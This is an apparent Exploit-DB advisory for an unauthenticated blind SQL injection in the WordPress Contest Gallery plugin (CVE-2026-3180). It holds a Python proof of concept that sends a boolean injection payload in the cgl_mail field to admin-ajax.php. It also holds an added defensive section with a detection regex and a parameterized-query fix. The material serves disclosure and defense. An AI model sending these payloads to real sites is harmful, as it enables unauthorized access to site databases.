WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection

EDB-ID: 52609
Platform: Multiple
Date: 2026-06-05


# Exploit Title: WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection
# Google Dork:  N/A
# Date: 2026-06-02
# Exploit Author: cardosource
# Vendor Homepage: https://contest-gallery.com/
# Software Link: https://wordpress.org/plugins/contest-gallery/
# Version: <= 28.1.4
# Tested on: Docker - PHP 8.2/Apache + MariaDB (WordPress Environment)
# CVE: CVE-2026-3180


"""
Description

A boolean-based blind SQL injection vulnerability exists in Contest Gallery versions 28.1.4 and earlier. The cause is unsafe use of the cgl_mail POST parameter handled by the post_cg1l_resend_unconfirmed_mail_frontend AJAX action: the value is passed through sanitize_email(), which keeps the single quote (') character because it is a legal character in the local part of an e-mail address. The sanitized value is then concatenated into a query executed with $wpdb->get_row() instead of being bound through $wpdb->prepare(), so an unauthenticated attacker can inject SQL conditions and infer the result from differences in the response.
Authentication Required: No

"""


import requests

# Fill in a valid cg_nonce taken from the plugin's frontend form; left blank here.
NONCE = " "
URL = "http://localhost:8080/wp-admin/admin-ajax.php"
endpoint = "/wp-admin/admin-ajax.php"
url = "http://localhost:8080/"
# Display string for the banner: the TRUE and FALSE boolean conditions, both placed
# in the local part of the e-mail address so that sanitize_email() leaves them intact.
payload = "'OR/**/1=1#@teste.com' and 'OR/**/1=2#@teste.com"


def send_payload(mail):
    """POST the resend-confirmation AJAX action with the supplied cgl_mail value."""
    data = {
        "action": "post_cg1l_resend_unconfirmed_mail_frontend",
        "cgl_mail": mail,
        "cgl_page_id": "1",
        "cgl_activation_key": "",
        "cg_nonce": NONCE,
    }
    return requests.post(URL, data=data)


# Send the TRUE condition; its status code and body length are what a boolean-based
# blind test compares against the FALSE condition.
r_true = send_payload("qualquer'OR/**/1=1#@teste.com")
status_code = r_true.status_code  # always set, so the banner cannot raise a NameError

banner = f"""
CVE : CVE-2026-3180 | Contest Gallery 28.1.4 : Boolean SQLi

payload :........................{payload}
end point :........................{endpoint}
url :..............................{url}
status :...........................{status_code}
nonce :............................{NONCE}
"""

print(banner)
print(f"Body length: {len(r_true.text)} chars")

# Query to inspect the affected table directly in the test database.
poc = '''\nmariadb wordpress_db -e "
SELECT * FROM wp_contest_gal1ery_create_user_entries
ORDER BY Tstamp DESC LIMIT 1115;"'''

print(poc)
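The description above makes two points a defender should be able to verify: sanitize_email() is not an SQL-safety function, because the single quote is a legal local-part character, and the correct fix is binding the value with $wpdb->prepare() rather than stripping characters. The following Python is an added illustration, not part of the original advisory or of the plugin's code. It assumes an approximate re-implementation of the local-part filter in sanitize_email() (the real function also checks length and domain labels), uses an in-memory SQLite table as a stand-in for the plugin's entries table (the table and column names here are constructed, not the plugin's), and runs a small detection rule over constructed admin-ajax request bodies.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Approximate re-implementation of the local-part filter in WordPress
# sanitize_email(): characters outside the RFC 5322 atext set are dropped.
# The single quote is inside that set, so it survives sanitization.
# (Assumption: simplified; the real function does further validation.)
LOCAL_PART_DISALLOWED = re.compile(r"[^a-zA-Z0-9!#$%&'*+/=?^_`{|}~.-]")
DOMAIN_DISALLOWED = re.compile(r"[^a-zA-Z0-9.-]")


def sanitize_email_approx(email: str) -> str:
    """Return the address with disallowed characters removed from each part."""
    local, sep, domain = email.rpartition("@")
    if not sep:
        return ""
    return LOCAL_PART_DISALLOWED.sub("", local) + "@" + DOMAIN_DISALLOWED.sub("", domain)


# --- Detection: flag cgl_mail values whose local part carries SQL syntax -------
TARGET_ACTION = "post_cg1l_resend_unconfirmed_mail_frontend"
# A quote alone is not enough (o'brien@example.com is a valid address); require a
# comment opener or a boolean keyword somewhere after the quote.
SQLI_AFTER_QUOTE = re.compile(r"'.*?(/\*|#|--|\b(?:or|and)\b)", re.I | re.S)


def flag_request(body: str) -> bool:
    """True if a POST body targets the vulnerable action with an injection-like e-mail."""
    params = parse_qs(body)
    if params.get("action", [""])[0] != TARGET_ACTION:
        return False
    mail = params.get("cgl_mail", [""])[0]  # parse_qs already URL-decodes the value
    local = mail.rpartition("@")[0]
    return bool(SQLI_AFTER_QUOTE.search(local))


# Constructed request bodies (not captured traffic): a legitimate address with an
# apostrophe, the advisory's TRUE-condition payload, and an unrelated AJAX action.
SAMPLE_REQUESTS = [
    "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=o%27brien%40example.com&cgl_page_id=1",
    "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=x%27OR%2F**%2F1%3D1%23%40example.com&cgl_page_id=1",
    "action=heartbeat&_nonce=abc123",
]


# --- Mitigation: bind the value instead of concatenating it ---------------------
def build_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the entries table (constructed schema, not the plugin's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE entries (id INTEGER PRIMARY KEY, email TEXT)")
    conn.executemany(
        "INSERT INTO entries (email) VALUES (?)",
        [("alice@example.com",), ("o'brien@example.com",)],
    )
    return conn


def lookup_entry(conn: sqlite3.Connection, email: str):
    """Hardened pattern: the e-mail is bound as data, never parsed as SQL.

    The WordPress equivalent is
    $wpdb->get_row($wpdb->prepare("SELECT ... WHERE email = %s", $email)).
    """
    return conn.execute(
        "SELECT id, email FROM entries WHERE email = ?", (email,)
    ).fetchone()


if __name__ == "__main__":
    print("sanitized:", sanitize_email_approx("x'OR/**/1=1#@example.com"))
    for body in SAMPLE_REQUESTS:
        print("flagged" if flag_request(body) else "ok     ", body)
    conn = build_demo_db()
    print("bound lookup (legit):   ", lookup_entry(conn, "o'brien@example.com"))
    print("bound lookup (payload): ", lookup_entry(conn, "x'OR/**/1=1#@example.com"))
```

The detection rule deliberately keys on tokens after the quote rather than on the quote itself, so that real addresses containing an apostrophe are not flagged; the bound lookup shows that with a placeholder the payload simply matches no row, which is why the remediation is $wpdb->prepare() and not a stricter sanitizer.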